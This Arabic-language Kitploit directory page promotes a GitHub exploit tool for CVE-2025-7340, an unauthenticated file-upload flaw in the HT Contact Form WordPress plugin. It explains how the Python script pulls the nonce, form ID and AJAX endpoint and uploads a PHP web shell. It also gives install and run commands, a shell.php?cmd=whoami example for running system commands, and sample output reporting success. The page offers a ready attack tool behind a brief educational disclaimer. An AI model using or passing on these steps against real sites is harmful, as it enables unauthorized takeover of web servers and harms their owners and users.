Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-7340 — HT Contact Form Widget لمنشئ صفحات Elementor وكتل Gutenberg ومنشئ النماذج. <= 2.2.1 - رفع ملفات تعسفي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-7340
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnxploited/cve-2025-7340

CVE-2025-7340

HT Contact Form Widget لمنشئ صفحات Elementor وكتل Gutenberg ومنشئ النماذج. <= 2.2.1 - رفع ملفات تعسفي بدون مصادقة

عرض المستودع
7منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 HT Contact Form Widget <= 2.2.1 - رفع ملفات تعسفي بدون مصادقة (CVE-2025-7340)

CVE: CVE-2025-7340
CVSS: 9.8 (حرِج)

📝 الوصف

إضافة HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. في ووردبريس عرضة لرفع ملفات تعسفي بسبب غياب التحقق من نوع الملف في دالة temp_file_upload في جميع الإصدارات حتى الإصدار 2.2.1 وما يشملها.

يسمح هذا للمهاجمين غير المصادَق عليهم برفع ملفات تعسفية إلى الخادم، مما قد يؤدي إلى تنفيذ أكواد عن بُعد (RCE).


⚡ سكربت الاستغلال

يحتوي هذا المستودع على سكربت استغلال بلغة Python يعمل على أتمتة اكتشاف النموذج القابل للاستغلال ورفع ويب شيل إلى الموقع المتأثر.

يكتشف السكربت بذكاء المعاملات المطلوبة (nonce, form_id, نقطة نهاية AJAX) ويرفع شيل PHP إلى المسار القابل للاستغلال.

✅ مثال على رابط النموذج القابل للاستغلال:

root@kitploit:~
http://target.com/contact/

✅ يجب أن يكون النموذج القابل للاستغلال موجودًا في الصفحة التي تمررها إلى خيار -u.


📦 المتطلبات

قبل تشغيل السكربت، ثبّت وحدات Python المطلوبة:

root@kitploit:~
pip install -r requirements.txt

محتوى requirements.txt:

root@kitploit:~
requests
colorama

🧰 الاستخدام

root@kitploit:~
usage: CVE-2025-7340.py [-h] 

Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com

الخيارات:

الخيارالوصف
-h, --helpعرض رسالة المساعدة هذه والخروج
-u, --url URLرابط الهدف، مثل: http(s)://target.com/contact

🐚 استخدام الويب شيل

بمجرد اكتمال الاستغلال بنجاح، يمكنك الوصول إلى الشيل الذي رفعته عبر المسار المعطى.

أضف ?cmd=<your_command> إلى نهاية الرابط لتنفيذ أوامر النظام.

✅ مثال:

root@kitploit:~
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ مثال على الإخراج

root@kitploit:~
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...

[+] Exploit Successfully!

Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 إخلاء مسؤولية

هذه الأداة مقدمة لأغراض تعليمية وبحثية فقط.
المؤلف غير مسؤول عن أي ضرر أو إساءة استخدام لهذا الكود.
احصل دائمًا على إذن صريح قبل اختبار أي نظام.


👨‍💻 بواسطة

Khaled Alenazi (Nxploited)
GitHub: Nxploited

تنزيل الأداة